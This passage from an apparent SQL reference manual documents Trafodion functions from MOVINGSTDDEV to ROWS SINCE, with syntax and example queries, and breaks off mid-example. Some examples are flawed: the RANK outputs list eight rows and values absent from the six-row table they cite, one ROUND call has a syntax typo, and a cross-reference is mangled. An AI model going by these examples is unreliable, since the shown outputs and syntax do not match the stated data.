MOVINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of a column in the\r\ncurrent window of three rows:\r\n+\r\n```\r\nSELECT MOVINGSTDDEV (I1,3) AS MOVINGSTDDEV3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSTDDEV3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.51150124820766640E+004\r\n 6.03627542446499008E+003\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGSTDDEV (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 15115.012\r\n 6036.275\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingsum_function]]\r\n== MOVINGSUM Function\r\n\r\nThe MOVINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSUM (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSUM returns the same result as\r\nRUNNINGSUM:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingsum]]\r\n=== Examples of MOVINGSUM\r\n\r\n* Return the sum of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGSUM (I1,3) AS MOVINGSUM3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSUM3\r\n------------\r\n 6215\r\n 34389\r\n 34389\r\n 32771\r\n 16563\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingvariance_function]]\r\n== MOVINGVARIANCE Function\r\n\r\nThe MOVINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column in the current window of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGVARIANCE (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGVARIANCE returns the same result as\r\nRUNNINGVARIANCE:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingvariance]]\r\n=== Examples of MOVINGVARIANCE\r\n\r\n* Return the variance of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGVARIANCE (I1,3) AS MOVINGVARIANCE3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGVARIANCE3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 2.28463602333333304E+008\r\n 3.64366210000000016E+007\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGVARIANCE (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 228463602.333\r\n 36436621.000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[nullif_function]]\r\n=== NULLIF Function\r\n\r\nThe NULLIF function compares the value of two expressions. Both\r\nexpressions must be of comparable types. The return value is NULL when\r\nthe two expressions are equal. Otherwise, the return value\r\nis the value of the first expression.\r\n\r\n```\r\nNULLIF(expr1, expr2)\r\n```\r\n* `_expr1_`\r\n+\r\nan expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nan expression to be compared.\r\n\r\nThe NULLIF(_expr1_, _expr2_) is equivalent to:\r\n\r\n```\r\nCASE\r\n WHEN expr1 = expr2 THEN NULL\r\n ELSE expr1\r\nEND\r\n```\r\n\r\nNULLIF returns a NULL if both arguments are equal. The return value is\r\nthe value of the first argument when the two expressions are not equal.\r\n\r\n[[examples_of_nullif]]\r\n=== Examples of NULLIF\r\n\r\n* This function returns a null if the _value_ is equal to 7. The return\r\nvalue is the value of the first argument when that value is not 7.\r\n+\r\n```\r\nNULLIF(value,7)\r\n```\r\n\r\n<<<\r\n[[nullifzero_function]]\r\n== NULLIFZERO Function\r\n\r\nThe NULLIFZERO function returns the value of the expression if that\r\nvalue is not zero. It returns NULL if the value of the expression is\r\nzero.\r\n\r\n```\r\nNULLIFZERO (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n\r\n<<<\r\n[[examples_of_nullifzero]]\r\n=== Examples of NULLIFZERO\r\n\r\n* This function returns the value of the column named salary for each\r\nrow where the column's value is not zero. It returns a NULL for each row\r\nwhere the column's value is zero.\r\n+\r\n```\r\nSELECT NULLIFZERO(salary) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of 1 for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(1) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of NULL for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(0) FROM employee_tab;\r\n```\r\n\r\n<<<\r\n[[nvl_function]]\r\n== NVL Function\r\n\r\nThe NVL function determines if the selected column has a null value and\r\nthen returns the new-operand value; otherwise the operand value is\r\nreturned.\r\n\r\n```\r\nNVL (operand, new-operand)\r\n```\r\n\r\n* `_operand_`\r\n+\r\nspecifies a value expression.\r\n\r\n* `_new-operand_`\r\n+\r\nspecifies a value expression. _operand_ and _new-operand_ must be\r\ncomparable data types.\r\n\r\nIf _operand_ is a null value, NVL returns _new-operand_. If _operand_\r\nis not a null value, NVL returns _operand_.\r\n\r\nThe _operand_ and _new-operand_ can be a column name, subquery,\r\n{project-name} SQL string functions, math functions, or constant values.\r\n\r\n[[examples_of_nvl]]\r\n=== Examples of NVL\r\n\r\n* This function returns a value of z:\r\n+\r\n```\r\nSELECT NVL(CAST(NULL AS CHAR(1)), 'z') FROM (VALUES(1)) x(a);\r\n\r\n(EXPR)\r\n------\r\n\"z\"\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 1:\r\n+\r\n```\r\nSELECT NVL(1, 2) FROM (VALUES(0)) x(a)\r\n\r\n(EXPR)\r\n-------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 9999999 for the null value in the\r\ncolumn named a1:\r\n+\r\n```\r\nSELECT NVL(a1, 9999999) from t1;\r\n\r\n(EXPR)\r\n-------\r\n 123\r\n 34\r\n9999999\r\n\r\n--- 3 row(s) selected.\r\n\r\nselect * from t1;\r\n\r\nA1\r\n-------\r\n 123\r\n 34\r\n ?\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[octet_length_function]]\r\n== OCTET_LENGTH Function\r\n\r\nThe OCTET_LENGTH function returns the length of a character string in\r\nbytes.\r\n\r\n```\r\nOCTET_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\nbytes. {project-name} SQL returns the result as a 2-byte signed integer with\r\na scale of zero. If _string-value-expression_ is null, {project-name} SQL returns\r\na length of zero.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_octet_length]]\r\n=== Considerations for OCTET_LENGTH\r\n\r\n[[char_and_varchar_operands_1]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the length of\r\nthat column as the maximum number of storage bytes. For a VARCHAR\r\ncolumn, {project-name} SQL returns the length of the string stored in that\r\ncolumn as the actual number of storage bytes.\r\n\r\n[[similarity_to_char_length_function]]\r\n==== Similarity to CHAR_LENGTH Function\r\n\r\nThe OCTET_LENGTH and CHAR_LENGTH functions are similar. The OCTET_LENGTH\r\nfunction returns the number of bytes, rather than the number of\r\ncharacters, in the string. This distinction is important for multi-byte\r\nimplementations. For an example of selecting a double-byte column, see\r\n<<examples_of_octet_length,Example of OCTET_LENGTH>>.\r\n\r\n[[examples_of_octet_length]]\r\n==== Examples of OCTET_LENGTH\r\n\r\n* If a character string is stored as two bytes for each character, this\r\nfunction returns the value 12. Otherwise, the function returns 6:\r\n+\r\n```\r\nOCTET_LENGTH ('Robert')\r\n```\r\n\r\n<<<\r\n[[offset_function]]\r\n=== OFFSET Function\r\n\r\nThe OFFSET function is a sequence function that retrieves columns from\r\nprevious rows of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement. See <<sequence_by\r\nclause>>._offset_is_a_trafodion_sql_extension.\r\n\r\n```\r\nOFFSET ( column-expression , number-rows [, max-rows ])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_number-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the offset as the number of rows from the current\r\nrow. If the number of rows exceeds _max-rows_, OFFSET returns\r\nOFFSET(_column-expression_,_max-rows_). If the number of rows is out\r\nof range and _max-rows_ is not specified or is out of range, OFFSET\r\nreturns null. The number of rows is out of range if it is larger than\r\nthe size of the result table, negative, or NULL.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows of the offset.\r\n\r\n[[examples_of_offset]]\r\n=== Examples of OFFSET\r\n\r\n* Retrieve the I1 column offset by three rows:\r\n+\r\n```\r\nSELECT OFFSET(I1,3) AS offset3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\noffset3\r\n------------\r\n ?\r\n ?\r\n ?\r\n 6215\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first three rows retrieved display null because the offset from the\r\ncurrent row does not fall within the result table.\r\n\r\n<<<\r\n[[pi_function]]\r\n== PI Function\r\n\r\nThe PI function returns the constant value of pi as a floating-point\r\nvalue.\r\n\r\nPI is a {project-name} SQL extension.\r\n\r\n```\r\nPI()\r\n```\r\n\r\n[[examples_of_pi]]\r\n=== Examples of PI\r\n\r\n* This constant function returns the value 3.14159260000000000E+000:\r\n+\r\n```\r\nPI()\r\n```\r\n\r\n<<<\r\n[[position_function]]\r\n== POSITION Function\r\n\r\nThe POSITION function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the POSITION function is equal to the result returned by the\r\n<<locate_function,LOCATE Function>>.\r\n\r\n```\r\nPOSITION (substring-expression IN source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nthe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If _substring-expression_ is not found in _source-expression_,\r\n{project-name} SQL returns zero.\r\n\r\n[[considerations_for_position]]\r\n=== Considerations for POSITION\r\n\r\n[[result_of_position]]\r\n==== Result of POSITION\r\n\r\nIf the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0. If\r\nthe length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n\r\nIf the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns zero. If\r\n_source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_the_upshift_function]]\r\n==== Using the UPSHIFT Function\r\n\r\nTo ignore case in the search, use the UPSHIFT function (or the LOWER\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_position]]\r\n=== Examples of POSITION\r\n\r\n* This function returns the value 8 for the position of the substring\r\n'John' within the string:\r\n+\r\n```\r\nPOSITION ('John' IN 'Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names. Return all records in table EMPLOYEE that\r\ncontain the substring 'Smith' regardless of whether the column value is\r\nin uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE POSITION ('SMITH' IN UPSHIFT(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[power_function]]\r\n== POWER Function\r\n\r\nThe POWER function returns the value of a numeric value expression\r\nraised to the power of an integer value expression. You can also use the\r\nexponential operator \\*\\*.\r\n\r\nPOWER is a {project-name} SQL extension.\r\n\r\n```\r\nPOWER (numeric-expression-1, numeric-expression-2)\r\n```\r\n\r\n* `_numeric-expression-1_, _numeric-expression-2_`\r\n+\r\nare SQL numeric value expressions that specify the values for the base\r\nand exponent arguments of the POWER function. See\r\n<<numeric_value_expressions>>.\r\n+\r\nIf base _numeric-expression-1 _is_zero, the exponent _numeric-expression-2_\r\nmust be greater than zero, and the result is zero. If the exponent is zero,\r\nthe base cannot be 0, and the result is 1. If the base is negative, the\r\nexponent must be a value with an exact numeric data type and a scale of zero.\r\n\r\n[[examples_of_power]]\r\n=== Examples of POWER\r\n\r\n* Return the value 15.625:\r\n+\r\n```\r\nPOWER (2.5,3)\r\n```\r\n\r\n* Return the value 27. The function POWER raised to the power of 2 is\r\nthe inverse of the function SQRT:\r\n+\r\n```\r\nPOWER (SQRT(27),2)\r\n```\r\n\r\n<<<\r\n[[quarter_function]]\r\n== QUARTER Function\r\n\r\nThe QUARTER function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 4 that represents the corresponding\r\nquarter of the year. Quarter 1 represents January 1 through March 31,\r\nand so on.\r\n\r\nQUARTER is a {project-name} SQL extension.\r\n\r\n```\r\nQUARTER (datetime-expression)\r\n```\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_quarter]]\r\n=== Examples of QUARTER\r\n\r\n* Return an integer that represents the quarter of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, QUARTER(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2\r\n```\r\n\r\n<<<\r\n[[radians_function]]\r\n== RADIANS Function\r\n\r\nThe RADIANS function converts a numeric value expression (expressed in\r\ndegrees) to the number of radians.\r\n\r\nRADIANS is a {project-name} SQL extension.\r\n\r\n```\r\nRADIANS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the RADIANS function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_radians]]\r\n=== Examples of RADIANS\r\n\r\n* Return the value 7.85398150000000000E-001, or approximately 0.78540 in degrees:\r\n+\r\n```\r\nRADIANS (45)\r\n```\r\n\r\n* Return the value 45 in degrees. The function DEGREES is the inverse of\r\nthe function RADIANS.\r\n+\r\n```\r\nDEGREES (RADIANS (45))\r\n```\r\n\r\n<<<\r\n[[runningrank_function]]\r\n== RANK\/RUNNINGRANK Function\r\n\r\nThe RANK\/RUNNINGRANK function is a sequence function that returns the\r\nrank of the given value of an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. RANK is an alternative syntax\r\nfor RANK\/RUNNINGRANK.\r\n\r\nRANK\/RUNNINGRANK is a {project-name} extension.\r\n\r\n```\r\nRUNNINGRANK(expression) | RANK(expression)\r\n```\r\n\r\n* _expression_\r\n+\r\nspecifies the expression on which to perform the rank.\r\n\r\nRANK\/RUNNINGRANK returns the rank of the expression within the\r\nintermediate result table. The definition of rank is as follows:\r\n\r\n```\r\nRANK = 1 for the first value of the intermediate result table.\r\n\r\n= the previous value of RANK if the previous value of expression is\r\nthe same as the current value of expression.\r\n\r\n= RUNNINGCOUNT(*) otherwise.\r\n```\r\n\r\nIn other words, RANK starts at 1. Values that are equal have the same\r\nrank. The value of RANK advances to the relative position of the row in\r\nthe intermediate result when the value changes.\r\n\r\n[[considerations_for_runningrank]]\r\n=== Considerations for RANK\/RUNNINGRANK\r\n\r\n[[sequence_order_dependency]]\r\n==== Sequence Order Dependency\r\n\r\nThe RUNNINGRANK function is meaningful only when the given expression is\r\nthe leading column of the SEQUENCE BY clause. This is because the\r\nRUNNINGRANK function assumes that the values of expression are in order\r\nand that like values are contiguous. If an ascending order is specified\r\nfor expression in the SEQUENCE BY clause, then the RUNNINGRANK function\r\nassigns a rank of 1 to the lowest value of expression. If a descending\r\norder is specified for expression in the SEQUENCE BY clause, then the\r\nRUNNINGRANK function assigns a rank of 1 to the highest value of\r\nexpression.\r\n\r\n[[runningrank_null_values]]\r\n==== NULL Values\r\n\r\nFor the purposes of RUNNINGRANK, NULL values are considered to be equal.\r\n\r\n[[examples_of_runningrank]]\r\n=== Examples of RANK\/RUNNINGRANK\r\n\r\n* Suppose that _seqfcn_ has been created as:\r\n+\r\n```\r\nCREATE TABLE cat.sch.seqfcn (i1 INTEGER, i2 INTEGER);\r\n```\r\n+\r\nThe table SEQFCN has columns _i1_ and _i2_ with data:\r\n+\r\n[cols=\"15%,85%\",options=\"header\"]\r\n|===\r\n| i1 | i2\r\n| 1 | 100\r\n| 3 | 200\r\n| 4 | 100\r\n| 2 | 200\r\n| 5 | 300\r\n| 10 | null\r\n|===\r\n\r\n* Return the rank of _i1_:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK(i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 1 1\r\n 2 2\r\n 3 3\r\n 4 4\r\n 5 5\r\n 6 6\r\n 8 7\r\n 10 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Return the rank of _i1_ descending:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK (i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1 DESC;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 10 1\r\n 8 2\r\n 6 3\r\n 5 4\r\n 4 5\r\n 3 6\r\n 2 7\r\n 1 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of _i2_, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 100 1\r\n 100 1\r\n 200 3\r\n 200 3\r\n 200 3\r\n 300 6\r\n ? 7\r\n ? 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n+\r\nNotice that the two NULL values received the same rank.\r\n\r\n<<<\r\n* Return the rank of _i2_ descending, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n ? 1\r\n ? 1\r\n 300 3\r\n 200 4\r\n 200 4\r\n 200 4\r\n 100 7\r\n 100 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of _i2_ descending, excluding NULL values:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn WHERE i2 IS NOT NULL SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 300 1\r\n 200 2\r\n 200 2\r\n 200 2\r\n 100 5\r\n 100 5\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[repeat_function]]\r\n== REPEAT Function\r\n\r\nThe REPEAT function returns a character string composed of the\r\nevaluation of a character expression repeated a specified number of\r\ntimes.\r\n\r\nREPEAT is a {project-name} SQL extension.\r\n\r\n```\r\nREPEAT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the specified number of\r\nrepeated strings. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n\r\nspecifies the number of times the source string _character-expr_ is to\r\nbe repeated. The number count must be a value greater than or equal\r\nto zero of exact numeric data type and with a scale of zero.\r\n\r\n[[examples_of_repeat]]\r\n=== Examples of REPEAT\r\n\r\n* Return this quote from Act 5, Scene 3, of King Lear:\r\n+\r\n```\r\nREPEAT ('Never,', 5)\r\n\r\nNever,Never,Never,Never,Never,\r\n```\r\n\r\n<<<\r\n[[replace_function]]\r\n== REPLACE Function\r\n\r\nThe REPLACE function returns a character string where all occurrences of\r\na specified character string in the original string are replaced with\r\nanother character string. All three character value expressions must be\r\ncomparable types. The return value is the VARCHAR type.\r\n\r\nREPLACE is a {project-name} SQL extension.\r\n\r\n```\r\nREPLACE (char-expr-1, char-expr-2, char-expr-3)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_, _char-expr-3_`\r\n+\r\nare SQL character value expressions. The operands are the result of\r\nevaluating the character expressions. All occurrences of _char-expr-2_\r\nin _char-expr-1_ are replaced by _char-expr-3_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_replace]]\r\n=== Examples of REPLACE\r\n\r\n* Use the REPLACE function to change job descriptions so that occurrences\r\nof the company name are updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job;\r\n\r\njob_description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n\r\nUPDATE persnl.job\r\nSET jobdesc = REPLACE(jobdesc, 'COMNET', 'TDMNET');\r\n\r\nJob Description\r\n------------------\r\nMANAGER TDMNET\r\nPRODUCTION TDMNET\r\nASSEMBLER TDMNET\r\nSALESREP TDMNET\r\nSYSTEM ANAL TDMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[right_function]]\r\n== RIGHT Function\r\n\r\nThe RIGHT function returns the rightmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nRIGHT is a {project-name} SQL extension.\r\n\r\n```\r\nRIGHT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the rightmost specified\r\nnumber of characters. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number count must be a value of exact numeric data type with a scale\r\nof zero.\r\n\r\n[[examples_of_right]]\r\n=== Examples of RIGHT\r\n\r\n* Return 'smith':\r\n+\r\n```\r\nRIGHT('robert_john_smith', 5)\r\n```\r\n\r\n* Suppose that a six-character company literal has been concatenated as\r\nthe first six characters to the job descriptions in the JOB table. Use\r\nthe RIGHT function to remove the company literal from the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = RIGHT (jobdesc, 12);\r\n```\r\n\r\n<<<\r\n[[round_function]]\r\n== ROUND Function\r\n\r\nThe ROUND function returns the value of _numeric_expr_ rounded to _num_\r\nplaces to the right of the decimal point.\r\n\r\nROUND is a {project-name} SQL extension.\r\n\r\n```\r\nROUND(numeric-expr [ , num ] )\r\n```\r\n\r\n* `_numeric-expr_`\r\n+\r\nis an SQL numeric value expression.\r\n\r\n* `_num_`\r\n+\r\nspecifies the number of places to the right of the decimal point for\r\nrounding. If _num_ is a negative number, all places to the right of the\r\ndecimal point and _num_ places to the left of the decimal point are\r\nzeroed. If _num_ is not specified or is 0, then all places to the right\r\nof the decimal point are zeroed.\r\n+\r\nFor any exact numeric value, the value _numeric_expr_ is rounded away\r\nfrom 0 (for example, to x+1 when x.5 is positive and to x-1 when x.5 is\r\nnegative). For the inexact numeric values (real, float, and double) the\r\nvalue _numeric_expr_ is rounded toward the nearest even number.\r\n\r\n<<<\r\n[[examples_of_round]]\r\n=== Examples of ROUND\r\n\r\n* This function returns the value of 123.46.\r\n+\r\n```\r\nROUND(123.4567,2)\r\n```\r\n\r\n* This function returns the value of 123.\r\n+\r\n```\r\nROUND(123.4567,0)\r\n```\r\n\r\n* This function returns the value of 120.\r\n+\r\n```\r\nROUND(123.4567,-1)\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nROUND(999.0,-4)\r\n```\r\n\r\n* This function returns the value of 1000.\r\n+\r\n```\r\nROUND(999.0.-3)\r\n```\r\n\r\n* This function returns the value of 2.0E+000.\r\n+\r\n```\r\nROUND(1.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 2.0E+00.\r\n+\r\n```\r\nROUND(2.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 1.0E+00.\r\n+\r\n```\r\nROUND(1.4E+000,0)\r\n```\r\n\r\n<<<\r\n[[rows_since_function]]\r\n== ROWS SINCE Function\r\n\r\nThe ROWS SINCE function is a sequence function that returns the number\r\nof rows counted since the specified condition was last true in the\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRows since is a {project-name} SQL extension.\r\n\r\n```\r\nROWS_SINCE [INCLUSIVE] (condition [, max-rows])\r\n```\r\n\r\n* `INCLUSIVE`\r\n+\r\nspecifies the current row is to be considered. If you specify INCLUSIVE,\r\nthe condition is evaluated in the current row. Otherwise, the condition\r\nis evaluated beginning with the previous row. If you specify INCLUSIVE\r\nand the condition is true in the current row, ROWS SINCE returns 0.\r\n\r\n* `_condition_`\r\n+\r\nspecifies a condition to be considered for each row in the result table.\r\nEach column in _condition_ must be a column that exists in the result\r\ntable. If the condition has never been true for the result table, ROWS\r\nSINCE returns null.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows from the current row\r\nto consider. If the condition has never been true for _max-rows_ from\r\nthe current row, or if _max-rows_ is negative or null, ROWS SINCE\r\nreturns null.\r\n\r\n[[considerations_for_rows_since]]\r\n=== Considerations for ROWS SINCE\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nIf you specify INCLUSIVE, the condition in each row of the result table\r\nis evaluated starting with the current row as row 0 (zero) (up to the\r\nmaximum number of rows or the size of the result table). Otherwise, the\r\ncondition is evaluated starting with the previous row as row 1.\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row.\r\n\r\n[[examples_of_rows_since]]\r\n=== Examples of ROWS SINCE\r\n\r\n* Return the number of rows since the condition\t_i1 IS NULL_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1 IS NULL) AS rows_since_null\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_null\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 2\r\n 1\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* Return the number of rows since the condition _i1 < i2_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1<i2), ROWS SINCE INCLUSIVE 